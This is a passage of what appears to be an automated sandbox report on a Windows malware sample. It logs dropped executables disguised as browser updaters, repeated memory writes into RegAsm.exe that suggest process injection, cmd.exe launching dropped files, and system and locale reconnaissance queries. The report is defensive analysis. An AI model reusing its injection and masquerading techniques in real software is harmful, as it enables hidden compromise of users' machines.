                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 131A008
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
                            Source: C:\Users\userCGHCGIIDGD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E4D008
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
                            Source: C:\Users\userJEHDHIEGII.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D87008
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
                            Source: C:\ProgramData\FIEHIIIJDA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 110F008
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
                            Source: C:\ProgramData\JJJEGCGDGH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E45008
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000
                            Source: C:\ProgramData\EBAEBFIIEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1057008
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checkerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCGHCGIIDGD.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userJEHDHIEGII.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userCGHCGIIDGD.exe "C:\Users\userCGHCGIIDGD.exe"
                            Source: C:\Users\userCGHCGIIDGD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userJEHDHIEGII.exe "C:\Users\userJEHDHIEGII.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\FIEHIIIJDA.exe "C:\ProgramData\FIEHIIIJDA.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\JJJEGCGDGH.exe "C:\ProgramData\JJJEGCGDGH.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\EBAEBFIIEC.exe "C:\ProgramData\EBAEBFIIEC.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC74760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,19_2_6BC74760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0053E01E cpuid 6_2_0053E01E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,6_2_00560274
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,6_2_00560479
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,6_2_0056056B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,6_2_00560520
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,6_2_00560606
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00560691
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,6_2_0055A725
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,6_2_005608E4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00560A0D
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,6_2_00560B13
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,6_2_0055ABF4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00560BE9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoEx,FormatMessageA,6_2_0053F870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,19_2_00417B90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeQueries volume information: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe VolumeInformation
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeQueries volume information: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation
                            Source: C:\Users\userCGHCGIIDGD.exeQueries volume information: C:\Users\userCGHCGIIDGD.exe VolumeInformation
                            Source: C:\Users\userJEHDHIEGII.exeQueries volume information: C:\Users\userJEHDHIEGII.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
